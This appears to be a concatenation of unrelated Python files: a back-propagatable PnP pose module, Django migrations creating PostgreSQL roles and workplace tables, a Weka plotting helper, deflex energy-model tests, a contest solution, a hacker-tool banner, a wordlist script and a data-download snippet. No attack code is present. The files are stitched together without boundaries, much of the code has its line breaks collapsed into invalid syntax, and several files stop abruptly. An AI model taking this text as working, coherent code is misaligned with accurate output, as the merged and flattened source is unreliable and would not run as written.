try: import kornia as kn except ImportError: log.error("Kornia is required for BPnP, please install it before proceeding.") __all__ = ["BPnP"] def _batch_project(P, pts3d, K, angle_axis=True): n = pts3d.size(0) bs = P.size(0) device = P.device pts3d_h = torch.cat((pts3d, torch.ones(n, 1, device=device)), dim=-1) if angle_axis: R_out = kn.angle_axis_to_rotation_matrix(P[:, 0:3].reshape(bs, 3)) PM = torch.cat((R_out[:, 0:3, 0:3], P[:, 3:6].reshape(bs, 3, 1)), dim=-1) else: PM = P pts3d_cam = pts3d_h.matmul(PM.transpose(-2, -1)) pts2d_proj = pts3d_cam.matmul(K.t()) S = pts2d_proj[:,:, 2].reshape(bs, n, 1) pts2d_pro = pts2d_proj[:, :, 0:2] / (S + 1e-12) return pts2d_pro def _get_coefs(P_6d, pts3d, K): device = P_6d.device n = pts3d.size(0) m = P_6d.size(-1) coefs = torch.zeros(n, 2, m, device=device) torch.set_grad_enabled(True) y = P_6d.repeat(n, 1) proj = _batch_project(y, pts3d, K).squeeze() vec = torch.diag(torch.ones(n,device=device).float()) for k in range(2): torch.set_grad_enabled(True) y_grad = torch.autograd.grad(proj[:, :, k], y, vec, retain_graph=True, create_graph=True) coefs[:, k, :] = -2.0 * y_grad[0].clone() return coefs class BPnPFunction_fast(torch.autograd.Function): """ BPnP_fast is the efficient version of the BPnP class which ignores the higher order dirivatives through the coefs' graph. This sacrifices negligible gradient accuracy yet saves significant runtime. 
INPUTS: pts2d - the 2D keypoints coordinates of size [batch_size, num_keypoints, 2] pts3d - the 3D keypoints coordinates of size [num_keypoints, 3] K - the camera intrinsic matrix of size [3, 3] OUTPUT: P_6d - the 6 DOF poses of size [batch_size, 6], where the first 3 elements of each row are the angle-axis rotation vector (Euler vector) and the last 3 elements are the translation vector. NOTE: This BPnP function assumes that all sets of 2D points in the mini-batch correspond to one common set of 3D points. For situations where pts3d is also a mini-batch, use the BPnP_m3d class. """ @staticmethod def forward(ctx, pts2d, pts3d, K, ini_pose=None): bs = pts2d.size(0) n = pts2d.size(1) device = pts2d.device K_np = np.array(K.detach().cpu()) P_6d = torch.zeros(bs,6,device=device) for i in range(bs): pts2d_i_np = np.ascontiguousarray(pts2d[i].detach().cpu()).reshape((n,1,2)) pts3d_i_np = np.ascontiguousarray(pts3d[i].detach().cpu()).reshape((n,3)) if ini_pose is None: _, rvec0, T0 = cv2.solvePnP( objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=False) else: rvec0 = np.array(ini_pose[i, 0:3].cpu().reshape(3, 1)) T0 = np.array(ini_pose[i, 3:6].cpu().reshape(3, 1)) _, rvec, T = cv2.solvePnP(objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0) _, rvec, T = cv2.solvePnP(objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0) angle_axis = torch.tensor(rvec,device=device,dtype=torch.float).reshape(1, 3) T = torch.tensor(T,device=device,dtype=torch.float).reshape(1, 3) P_6d[i,:] = torch.cat((angle_axis,T),dim=-1) ctx.save_for_backward(pts2d,P_6d,pts3d,K) return P_6d @staticmethod def backward(ctx, grad_output): pts2d, P_6d, pts3d, K = ctx.saved_tensors device = pts2d.device bs = pts2d.size(0) n = pts2d.size(1) m = 6 grad_x = torch.zeros_like(pts2d) grad_z = torch.zeros_like(pts3d) grad_K = torch.zeros_like(K) for i in range(bs): J_fy = torch.zeros(m,m, device=device) J_fx = torch.zeros(m,2*n, device=device) J_fz = torch.zeros(m,3*n, device=device) J_fK = torch.zeros(m, 9, device=device) pts2d_flat = pts2d[i].clone().reshape(-1).detach().requires_grad_() P_6d_flat = P_6d[i].clone().reshape(-1).detach().requires_grad_() pts3d_flat = pts3d[i].clone().reshape(-1).detach().requires_grad_() coefs = _get_coefs(P_6d[i].reshape(1,6), pts3d_flat.reshape(n,3), K).detach() K_flat = K.clone().reshape(-1).detach().requires_grad_() for j in range(m): torch.set_grad_enabled(True) if j > 0: pts2d_flat.grad.zero_() P_6d_flat.grad.zero_() pts3d_flat.grad.zero_() K_flat.grad.zero_() R = kn.angle_axis_to_rotation_matrix(P_6d_flat[0:m-3].reshape(1,3)) P = torch.cat((R[0,0:3,0:3].reshape(3,3), P_6d_flat[m-3:m].reshape(3,1)),dim=-1) KP = torch.mm(K_flat.reshape(3,3), P) pts2d_i = pts2d_flat.reshape(n,2).transpose(0,1) pts3d_i = torch.cat((pts3d_flat.reshape(n,3),torch.ones(n,1,device=device)),dim=-1).t() proj_i = KP.mm(pts3d_i) Si = proj_i[2,:].reshape(1,n) r = pts2d_i*Si-proj_i[0:2,:] coef = coefs[:,:,j].transpose(0,1) # size: [2,n] fj = (coef*r).sum() fj.backward() J_fy[j,:] = P_6d_flat.grad.clone() J_fx[j,:] = pts2d_flat.grad.clone() J_fz[j,:] = pts3d_flat.grad.clone() J_fK[j,:] = K_flat.grad.clone() inv_J_fy = torch.inverse(J_fy) J_yx = (-1) * torch.mm(inv_J_fy, J_fx) J_yz = (-1) * torch.mm(inv_J_fy, J_fz) J_yK = (-1) * 
torch.mm(inv_J_fy, J_fK) grad_x[i] = grad_output[i].reshape(1,m).mm(J_yx).reshape(n,2) grad_z += grad_output[i].reshape(1,m).mm(J_yz).reshape(n,3) grad_K += grad_output[i].reshape(1,m).mm(J_yK).reshape(3,3) return grad_x, grad_z, grad_K, None class BPnPFunction_m3d(torch.autograd.Function): """ BPnP_m3d supports mini-batch inputs of 3D keypoints, where the i-th set of 2D keypoints correspond to the i-th set of 3D keypoints. INPUTS: pts2d - the 2D keypoints coordinates of size [batch_size, num_keypoints, 2] pts3d - the 3D keypoints coordinates of size [batch_size, num_keypoints, 3] K - the camera intrinsic matrix of size [3, 3] OUTPUT: P_6d - the 6 DOF poses of size [batch_size, 6], where the first 3 elements of each row are the angle-axis rotation vector (Euler vector) and the last 3 elements are the translation vector. NOTE: For situations where all sets of 2D points in the mini-batch correspond to one common set of 3D points, use the BPnP class. """ @staticmethod def forward(ctx, pts2d, pts3d, K, ini_pose=None): bs = pts2d.size(0) n = pts2d.size(1) device = pts2d.device K_np = np.array(K.detach().cpu()) P_6d = torch.zeros(bs,6,device=device) for i in range(bs): pts2d_i_np = np.ascontiguousarray(pts2d[i].detach().cpu()).reshape((n,1,2)) pts3d_i_np = np.ascontiguousarray(pts3d[i].detach().cpu()).reshape((n,3)) if ini_pose is None: _, rvec0, T0 = cv2.solvePnP( objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=False) else: rvec0 = np.array(ini_pose[i, 0:3].cpu().reshape(3, 1)) T0 = np.array(ini_pose[i, 3:6].cpu().reshape(3, 1)) _, rvec, T = cv2.solvePnP(objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0) angle_axis = torch.tensor(rvec,device=device,dtype=torch.float).reshape(1, 3) T = torch.tensor(T,device=device,dtype=torch.float).reshape(1, 3) P_6d[i,:] = torch.cat((angle_axis,T),dim=-1) ctx.save_for_backward(pts2d,P_6d,pts3d,K) return P_6d @staticmethod def backward(ctx, grad_output): pts2d, P_6d, pts3d, K = ctx.saved_tensors device = pts2d.device bs = pts2d.size(0) n = pts2d.size(1) m = 6 grad_x = torch.zeros_like(pts2d) grad_z = torch.zeros_like(pts3d) grad_K = torch.zeros_like(K) for i in range(bs): J_fy = torch.zeros(m,m, device=device) J_fx = torch.zeros(m,2*n, device=device) J_fz = torch.zeros(m,3*n, device=device) J_fK = torch.zeros(m, 9, device=device) torch.set_grad_enabled(True) pts2d_flat = pts2d[i].clone().reshape(-1).detach().requires_grad_() P_6d_flat = P_6d[i].clone().reshape(-1).detach().requires_grad_() pts3d_flat = pts3d[i].clone().reshape(-1).detach().requires_grad_() K_flat = K.clone().reshape(-1).detach().requires_grad_() for j in range(m): torch.set_grad_enabled(True) if j > 0: pts2d_flat.grad.zero_() P_6d_flat.grad.zero_() pts3d_flat.grad.zero_() K_flat.grad.zero_() R = kn.angle_axis_to_rotation_matrix(P_6d_flat[0:m-3].reshape(1,3)) P = torch.cat((R[0,0:3,0:3].reshape(3,3), P_6d_flat[m-3:m].reshape(3,1)),dim=-1) KP = torch.mm(K_flat.reshape(3,3), P) pts2d_i = pts2d_flat.reshape(n,2).transpose(0,1) pts3d_i = torch.cat((pts3d_flat.reshape(n,3),torch.ones(n,1,device=device)),dim=-1).t() proj_i = KP.mm(pts3d_i) Si = proj_i[2,:].reshape(1,n) r = pts2d_i*Si-proj_i[0:2,:] coefs = _get_coefs(P_6d_flat.reshape(1,6), pts3d_flat.reshape(n,3), K_flat.reshape(3,3)) coef = coefs[:,:,j].transpose(0,1) # size: [2,n] fj = (coef*r).sum() fj.backward() J_fy[j,:] = P_6d_flat.grad.clone() J_fx[j,:] 
= pts2d_flat.grad.clone() J_fz[j,:] = pts3d_flat.grad.clone() J_fK[j,:] = K_flat.grad.clone() inv_J_fy = torch.inverse(J_fy) J_yx = (-1) * torch.mm(inv_J_fy, J_fx) J_yz = (-1) * torch.mm(inv_J_fy, J_fz) J_yK = (-1) * torch.mm(inv_J_fy, J_fK) grad_x[i] = grad_output[i].reshape(1,m).mm(J_yx).reshape(n,2) grad_z[i] = grad_output[i].reshape(1,m).mm(J_yz).reshape(n,3) grad_K += grad_output[i].reshape(1,m).mm(J_yK).reshape(3,3) return grad_x, grad_z, grad_K, None class BPnPFunction(torch.autograd.Function): r"""Back-propagatable PnP Arguments: pts2d - the 2D keypoints coordinates of size [batch_size, num_keypoints, 2] pts3d - the 3D keypoints coordinates of size [num_keypoints, 3] K - the camera intrinsic matrix of size [3, 3] Returns: P_6d - the 6 DOF poses of size [batch_size, 6], where the first 3 elements of each row are the angle-axis rotation vector (Euler vector) and the last 3 elements are the translation vector. NOTE: This bpnp function assumes that all sets of 2D points in the mini-batch correspond to one common set of 3D points. """ @staticmethod def forward(ctx, pts2d, pts3d, K, ini_pose=None): bs = pts2d.size(0) n = pts2d.size(1) device = pts2d.device pts3d_np = np.array(pts3d.detach().cpu()) K_np = np.array(K.detach().cpu()) P_6d = torch.zeros(bs,6,device=device) try: distCoeffs = pnp.distCoeffs except: distCoeffs = np.zeros((8, 1), dtype='float32') for i in range(bs): pts2d_i_np = np.ascontiguousarray(pts2d[i].detach().cpu()).reshape((n, 1, 2)) if ini_pose is None: _, rvec0, T0 = cv2.solvePnP( objectPoints=pts3d_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=distCoeffs, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=False ) else: rvec0 = np.array(ini_pose[0, 0:3].cpu().reshape(3, 1)) T0 = np.array(ini_pose[0, 3:6].cpu().reshape(3, 1)) _, rvec, T = cv2.solvePnP( objectPoints=pts3d_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0 ) angle_axis = torch.Tensor(rvec).reshape(1, 3).float().to(device) T = torch.Tensor(T).reshape(1, 3).float().to(device) P_6d[i, :] = torch.cat((angle_axis, T),dim=-1) ctx.save_for_backward(pts2d,P_6d,pts3d,K) return P_6d @staticmethod def backward(ctx, grad_output): pts2d, P_6d, pts3d, K = ctx.saved_tensors device = pts2d.device bs = pts2d.size(0) n = pts2d.size(1) #nof keypoints m = 6 grad_x = torch.zeros_like(pts2d) grad_z = torch.zeros_like(pts3d) grad_K = torch.zeros_like(K) for i in range(bs): J_fy = torch.zeros(m, m, device=device) J_fx = torch.zeros(m, 2 * n, device=device) J_fz = torch.zeros(m, 3 * n, device=device) J_fK = torch.zeros(m, 9, device=device) torch.set_grad_enabled(True) pts2d_flat = pts2d[i].clone().reshape(-1).detach().requires_grad_() P_6d_flat = P_6d[i].clone().reshape(-1).detach().requires_grad_() pts3d_flat = pts3d.clone().reshape(-1).detach().requires_grad_() K_flat = K.clone().reshape(-1).detach().requires_grad_() for j in range(m): if j > 0: pts2d_flat.grad.zero_() P_6d_flat.grad.zero_() pts3d_flat.grad.zero_() K_flat.grad.zero_() R = kn.angle_axis_to_rotation_matrix(P_6d_flat[0: m-3].reshape(1, 3)) P = torch.cat(( R[0, 0:3, 0:3].reshape(3, 3), P_6d_flat[m-3:m].reshape(3, 1) ), dim=-1) KP = torch.mm(K_flat.reshape(3, 3), P) pts2d_i = pts2d_flat.reshape(n, 2).transpose(0, 1) pts3d_i = torch.cat(( pts3d_flat.reshape(n, 3), torch.ones(n, 1, device=device) ), dim=-1).t() proj_i = KP.mm(pts3d_i) Si = proj_i[2, :].reshape(1, n) r = pts2d_i * Si - proj_i[0:2, :] coefs = _get_coefs( P_6d_flat.reshape(1, 6), pts3d_flat.reshape(n, 3), 
K_flat.reshape(3, 3) ) coef = coefs[:, :, j].transpose(0, 1) # size: [2,n] fj = (coef * r).sum() fj.backward() J_fy[j, :] = P_6d_flat.grad.clone() J_fx[j, :] = pts2d_flat.grad.clone() J_fz[j, :] = pts3d_flat.grad.clone() J_fK[j, :] = K_flat.grad.clone() inv_J_fy = torch.inverse(J_fy) J_yx = (-1.0) * torch.mm(inv_J_fy, J_fx) J_yz = (-1.0) * torch.mm(inv_J_fy, J_fz) J_yK = (-1.0) * torch.mm(inv_J_fy, J_fK) grad_x[i] = grad_output[i].reshape(1, m).mm(J_yx).reshape(n, 2) grad_z += grad_output[i].reshape(1, m).mm(J_yz).reshape(n, 3) grad_K += grad_output[i].reshape(1, m).mm(J_yK).reshape(3, 3) return grad_x, grad_z, grad_K, None class BPnP(torch.nn.Module): def __init__(self, isBatch: bool=False, # whether 3D keypoints is a mini-batch transpose: bool=True, #whether to transpose the camera matrix useFast: bool=False, #whether to use faster implementation of BPnP ): super(BPnP, self).__init__() self.BPnP_func = BPnPFunction if not isBatch else BPnPFunction_fast \ if useFast else BPnPFunction_m3d self.transpose = transpose def forward(self, keypoints2d: torch.Tensor, # [B, K, 2] intrinsics: torch.Tensor, # [3, 3] keypoints3d: torch.Tensor, # [K, 3] or # [B,K,3] ) -> torch.Tensor: # [B, 6] intrinsics = intrinsics[0,:,:] if len(intrinsics.shape) == 3 else intrinsics intrinsics = intrinsics.t() if self.transpose else intrinsics P_6d = self.BPnP_func.apply(keypoints2d, keypoints3d, intrinsics) return P_6d""" Migrate initial users and roles. https://docs.djangoproject.com/en/3.0/topics/migrations/ This one migration should be run on the 'postgres' database alias. > python manage.py migrate --database=postgres registry 0000 All subsequent migrations should be run on the 'migration' > python manage.py migrate --database=migration """ import sys from django.db import migrations from django.conf import settings import wellregistry.pgsql_utils as pgsql env = settings.ENVIRONMENT class Migration(migrations.Migration): """ SQL to create the database user roles. This creates a new database and schema owner in PG for an application specific name. The "postgres" database and password is Already created during database install. instance (daemon) postgres database 'postgres' admin user name and password loosely like the Oracle 'sys' schema application database app db owner(roles) a postgres role granted logon and DDL with optional schemas, 'public' default read-only user(roles) (typical but not the registry) a postgres role granted logon and SELECT only access client user(roles) (aka agency or provider) connection to postgres for all django client actions a postgres role granted logon and SELECT access and CRUD/DML on limited tables all client logins will be authenticated with login.gov admin user(roles) (aka superuser) connection to postgres for all django admin actions a postgres role granted logon and all CRUD/DML access first authenticated with login.gov then authenticated with django admin login """ initial = False dependencies = [] # We have an option here. we can use the empty dependencies or the following 'postgres' migration dependency. # dependencies = [('postgres', '0001_create_db_users')] # However, when a dependency is used then the executions must be in he django_migrations table. # In order for this metadata to be correct in the application database requires that the migration # for postgres entries to be run in fake mode for the application database. This prevents them from # running twice and causing errors. In an attempt to make them idempotent, the roles are dropped first. 
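    # (A hedged alternative sketch, not used in this migration: role creation can be made
    #  conditional without a prior DROP by wrapping the statement in a PL/pgSQL DO block, e.g.
    #      migrations.RunSQL(sql="""
    #          DO $$ BEGIN
    #              IF NOT EXISTS (SELECT 1 FROM pg_roles WHERE rolname = 'some_role') THEN
    #                  CREATE ROLE some_role LOGIN;
    #              END IF;
    #          END $$;""")
    #  where 'some_role' is a placeholder for the role name taken from the environment settings.)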
# It turns out that if the roles have dependencies then they cannot be dropped. This drop was done # because there is no CREATE ROLE IF NOT EXISTS in postgres. Also, there is no clean way for Django to # check if an object exists like we have for the yaml based liquibase changelogs. # python -m manage migrate --fake postgres if 'test' in sys.argv: operations = [] else: operations = [ # create a application specific schema within the database the connection is made migrations.RunSQL( sql=f"""CREATE SCHEMA IF NOT EXISTS {env['APP_SCHEMA_NAME']} AUTHORIZATION {env['APP_SCHEMA_OWNER_USERNAME']};""", reverse_sql=f"DROP SCHEMA IF EXISTS {env['APP_SCHEMA_NAME']};"), migrations.RunSQL( sql=f"ALTER DATABASE {env['APP_DATABASE_NAME']} SET search_path = {env['APP_SCHEMA_NAME']}, public;", reverse_sql=f"ALTER DATABASE {env['APP_DATABASE_NAME']} RESET search_path;"), # create a login user that will used by the Django admin process to manage entries migrations.RunSQL( sql=pgsql.create_login_role(env['APP_ADMIN_USERNAME'], env['APP_ADMIN_PASSWORD']), reverse_sql=pgsql.drop_role(env['APP_ADMIN_USERNAME'])), # grant CRUD to admin user migrations.RunSQL( sql=pgsql.grant_default(env['APP_SCHEMA_NAME'], 'CRUD', env['APP_ADMIN_USERNAME']), reverse_sql=pgsql.revoke_default(env['APP_SCHEMA_NAME'], 'CRUD', env['APP_ADMIN_USERNAME'])), # create a login user that will used by the app users to manage entries migrations.RunSQL( sql=pgsql.create_login_role(env['APP_CLIENT_USERNAME'], env['APP_CLIENT_PASSWORD']), reverse_sql=pgsql.drop_role(env['APP_CLIENT_USERNAME'])), # grant select to client user migrations.RunSQL( sql=pgsql.grant_default(env['APP_SCHEMA_NAME'], 'SELECT', env['APP_CLIENT_USERNAME']), reverse_sql=pgsql.revoke_default(env['APP_SCHEMA_NAME'], 'SELECT', env['APP_CLIENT_USERNAME'])), # grant CRUD to app user -- after 0001_initial, this cannot be granted until the tables is created ] akshat0109/kisan_backend # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # clusterers.py # Copyright (C) 2014-2015 Fracpete (pythonwekawrapper at gmail dot com) import logging import weka.plot as plot if plot.matplotlib_available: import matplotlib.pyplot as plt from weka.core.dataset import Instances from weka.clusterers import ClusterEvaluation # logging setup logger = logging.getLogger(__name__) def plot_cluster_assignments(evl, data, atts=None, inst_no=False, size=10, title=None, outfile=None, wait=True): """ Plots the cluster assignments against the specified attributes. 
TODO: click events http://matplotlib.org/examples/event_handling/data_browser.html :param evl: the cluster evaluation to obtain the cluster assignments from :type evl: ClusterEvaluation :param data: the dataset the clusterer was evaluated against :type data: Instances :param atts: the list of attribute indices to plot, None for all :type atts: list :param inst_no: whether to include a fake attribute with the instance number :type inst_no: bool :param size: the size of the circles in point :type size: int :param title: an optional title :type title: str :param outfile: the (optional) file to save the generated plot to. The extension determines the file format. :type outfile: str :param wait: whether to wait for the user to close the plot :type wait: bool """ if not plot.matplotlib_available: logger.error("Matplotlib is not installed, plotting unavailable!") return fig = plt.figure() if data.class_index == -1: c = None else: c = [] for i in xrange(data.num_instances): inst = data.get_instance(i) c.append(inst.get_value(inst.class_index)) if atts is None: atts = [] for i in xrange(data.num_attributes): atts.append(i) num_plots = len(atts) if inst_no: num_plots += 1 clusters = evl.cluster_assignments for index, att in enumerate(atts): x = data.values(att) ax = fig.add_subplot( 1, num_plots, index + 1) if c is None: ax.scatter(clusters, x, s=size, alpha=0.5) else: ax.scatter(clusters, x, c=c, s=size, alpha=0.5) ax.set_xlabel("Clusters") ax.set_title(data.attribute(att).name) ax.get_xaxis().set_ticks(list(set(clusters))) ax.grid(True) if inst_no: x = [] for i in xrange(data.num_instances): x.append(i+1) ax = fig.add_subplot( 1, num_plots, num_plots) if c is None: ax.scatter(clusters, x, s=size, alpha=0.5) else: ax.scatter(clusters, x, c=c, s=size, alpha=0.5) ax.set_xlabel("Clusters") ax.set_title("Instance number") ax.get_xaxis().set_ticks(list(set(clusters))) ax.grid(True) if title is None: title = data.relationname fig.canvas.set_window_title(title) plt.draw() if not outfile is None: plt.savefig(outfile) if wait: plt.show() tests/test_render.py100-1000 # tests/test_render.py # <> # # This module is part of Hypatia and is released under the # MIT license: http://opensource.org/licenses/MIT """py.test unit testing for hypatia/render.py Run py.test on this module to assert hypatia.render is completely functional. Example: Use from project root like so: $ py.test tests """ import os import pygame import pytest from hypatia import render try: os.chdir('demo') except OSError: pass # -*- coding: utf-8 -*- """ Processing a list of power plants in Germany. SPDX-FileCopyrightText: 2016-2021 <> SPDX-License-Identifier: MIT """ __copyright__ = " <>" __license__ = "MIT" import os import shutil import pandas as pd import pytest from deflex import scenario from deflex.tools import TEST_PATH from deflex.tools import fetch_example_results def test_basic_scenario_class(): sc = scenario.Scenario() sc.create_nodes() def test_scenario_building(): sc = scenario.DeflexScenario(name="test", year=2014) csv_path = os.path.join( os.path.dirname(__file__), "data", "deflex_2014_de21_test_csv" ) sc.read_csv(csv_path) sc.table2es() sc.check_input_data() sc.input_data["volatile series"].loc[5, ("DE01", "wind")] = float("nan") with pytest.raises( ValueError, match=r"NaN values found in table:'volatile series'" ): sc.check_input_data() def test_node_dict(): nc = scenario.NodeDict() nc["g"] = 5 nc["h"] = 6 msg = ( "Key 'g' already exists. Duplicate keys are not allowed in a " "node dictionary." 
) with pytest.raises(KeyError, match=msg): nc["g"] = 7 def test_scenario_es_init(): data = { "general": pd.Series( {"year": 2013, "name": "test", "number of time steps": 8760} ) } sc = scenario.DeflexScenario(input_data=data, debug=True) es1 = sc.initialise_energy_system().es sc = scenario.DeflexScenario(input_data=data) es2 = sc.initialise_energy_system().es sc = scenario.DeflexScenario(input_data=data) sc.input_data["general"]["year"] = 2012 with pytest.warns(UserWarning, match="2012 is a leap year but the"): print(sc.initialise_energy_system().es) sc.input_data["general"]["number of time steps"] = 8784 es3 = sc.initialise_energy_system().es assert len(es1.timeindex) == 3 assert len(es2.timeindex) == 8760 assert len(es3.timeindex) == 8784 def test_scenario_es_init_error(): sc = scenario.DeflexScenario() msg = "There is no input data in the scenario. You cannot initialise an" with pytest.raises(ValueError, match=msg): sc.initialise_energy_system() def test_excel_reader(): sc = scenario.DeflexScenario() xls_fn = fetch_example_results("de02_short.xlsx") sc.read_xlsx(xls_fn) sc.initialise_energy_system() sc.table2es() csv_path = os.path.join(TEST_PATH, "deflex_2013_de02_tmp_X45_test_csv") sc.to_csv(csv_path) xls_fn = os.path.join(TEST_PATH, "deflex_2014_de02_tmp_X45_test") sc.to_xlsx(xls_fn) xls_fn += ".xlsx" sc.to_xlsx(xls_fn) shutil.rmtree(csv_path) os.remove(xls_fn) def test_build_model(): sc = scenario.DeflexScenario(debug=True) xls_fn = fetch_example_results("de02_short.xlsx") sc.read_xlsx(xls_fn) sc.compute() assert sc.es.results["meta"]["name"] == "deflex_2014_de02" def test_build_model_manually(): sc = scenario.DeflexScenario(debug=True) xls_fn = fetch_example_results("de02_short.xlsx") sc.read_xlsx(xls_fn) sc.initialise_energy_system() test_nodes = sc.create_nodes() sc.add_nodes_to_es(test_nodes) dump_fn = os.path.join(TEST_PATH, "pytest_test") sc.dump(dump_fn) model = sc.create_model() sc.solve(model=model, solver="cbc", with_duals=True) assert sc.es.results["meta"]["name"] == "deflex_2014_de02" dump_fn += ".dflx" sc.dump(dump_fn) sc.plot_nodes() scenario.restore_scenario(dump_fn, scenario.DeflexScenario) assert sc.meta["year"] == 2014 os.remove(dump_fn) def test_corrupt_data(): sc = scenario.DeflexScenario(year=2014) csv_path = os.path.join( os.path.dirname(__file__), "data", "deflex_2014_de02_test_csv" ) sc.read_csv(csv_path) sc.input_data["volatile series"].drop( ("DE02", "solar"), inplace=True, axis=1 ) msg = "Missing time series for solar" with pytest.raises(ValueError, match=msg): sc.table2es() def test_restore_an_invalid_scenario(): filename = fetch_example_results("de02.xlsx") msg = "The suffix of a valid deflex scenario has to be '.dflx'." 
with pytest.raises(IOError, match=msg): scenario.restore_scenario(filename) class TestInputDataCheck: @classmethod def setup_class(cls): cls.sc = scenario.DeflexScenario() fn = os.path.join(TEST_PATH, "de02_short.xlsx") cls.sc.read_xlsx(fn) cls.sc.input_data["general"]["regions"] = float("nan") def test_nan_value_in_general_table_series(self): with pytest.raises(ValueError, match="'general'"): self.sc.check_input_data() def test_nan_values_warnings(self, recwarn): self.sc.input_data["volatile series"].loc[5, ("DE01", "wind")] = float( "nan" ) self.sc.check_input_data(warning=True) assert len(recwarn) == 2 assert "table:'general', column(s): Index(['regions']" in str( recwarn[0].message ) assert ( "table:'volatile series', column(s): (('DE01', 'wind'),)" in str(recwarn[1].message) ) def test_wrong_length(self): msg = "Number of time steps is 97 but the length of the volatile serie" with pytest.raises(ValueError, match=msg): self.sc.initialise_energy_system() xsthunder/aat/abc124/b.py read = input n = int(read()) A = list(map(int, read().split())) cnt = 0 for p in enumerate(A): i, x = p if i == 0: cnt = cnt + 1 elif x >= max(A[0:i]): cnt = cnt + 1 print(cnt) CHHOrganization/BlackDoc import os,sys,time Banner_msg = "Follow Us At Telegram To Stay Upto Date." Line = "*****************************************" Endl2 = " 100% DC. Tool Is Done Loading " DCWMs = " Welcome 2 DarkCity - DC. Tool " #Clearing Screen def clearConsole(): Refresh = 'clear' if os.name in ('nt', 'dos'): #If Machine is running on Windows, it will use cls Refresh = 'cls' os.system(Refresh) def DC_Banner(): #Banner Data print("|//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\|\n\ |\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//|\n\ |//\\\//\\\->Cryptic Hats Hackers<-//\\\//\\\|\n\ |\\\//\\\//\\\->DC. 
Tool V0.0.01<-//\\\//\\\//|\n\ |//\\\//\\\//\\\->SAFWAL 1.0.1<-//\\\//\\\//\\\|\n\ |\\\//\\\//\\\//\\\->Temina 1<-//\\\//\\\//\\\//|\n\ |//\\\//\\\//\\\\//\\\->.Org<-//\\\//\\\//\\\//\\\|\n\ |\\\//\\\//\\\//\\\//\\\-><-//\\\//\\\//\\\//\\\//|\n\ |//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\|") jakelever/biowordlists import argparse from collections import defaultdict def main(): parser = argparse.ArgumentParser(description='') parser.add_argument('--wordlist',required=True,type=str,help='Wordlist to help resolve conflicts') parser.add_argument('--conflicts',required=True,type=str,help='File with conflicting terms (separated by ;)') parser.add_argument('--nowarn', action='store_true', help='Do not check for missing conflicts where one is expected') parser.add_argument('--outFile',required=True,type=str,help='Output file with resolution options (for deletions file)') args = parser.parse_args() print("Loading wordlist...") main_terms = {} synonym_to_identifier = defaultdict(list) with open(args.wordlist) as f: for line in f: split = line.strip('\n').split('\t') identifier,main,synonyms = split[:3] main_terms[identifier] = main for s in synonyms.lower().split('|'): synonym_to_identifier[s].append(identifier) print("Processing conflicts...") with open(args.conflicts) as f, open(args.outFile,'w') as outF: conflicting_terms = sorted(set([ line.strip().lower() for line in f ])) for ct in conflicting_terms: identifiers = synonym_to_identifier[ct] if not args.nowarn: assert len(identifiers) > 1, "Couldn't find conflict for term: %s" % ct if len(identifiers) > 1: for identifier in identifiers: outData = [ identifier, main_terms[identifier], ct ] outF.write("\t".join(outData) + "\n") print("Done") if __name__ == '__main__': main() import urllib.request import zipfile urllib.request.urlretrieve("http://hdfs.api.wa.bl.uk/webhdfs/v1/9_processing/w3act/w3act-db-csv.zip?user.name=access&op=OPEN", "w3act-db-csv.zip") with zipfile.ZipFile("w3act-db-csv.zip", 'r') as zip_ref: zip_ref.extractall(".") # Generated by Django 2.2.11 on 2020-03-20 04:55 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='UserWorkPlace', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('is_admin', models.BooleanField(default=False)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'db_table': 'user_workplace', }, ), migrations.CreateModel( name='Workplace', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(blank=True, max_length=255, null=True, unique=True)), ('created_at', models.DateTimeField(auto_now_add=True, null=True)), ('user', models.ManyToManyField(related_name='user', through='workplace.UserWorkPlace', to=settings.AUTH_USER_MODEL)), ], options={ 'db_table': 'workplace', }, ), migrations.AddField( model_name='userworkplace', name='workplace', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workplace.Workplace'), ), ] InquestGeronimo/deepsparse # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
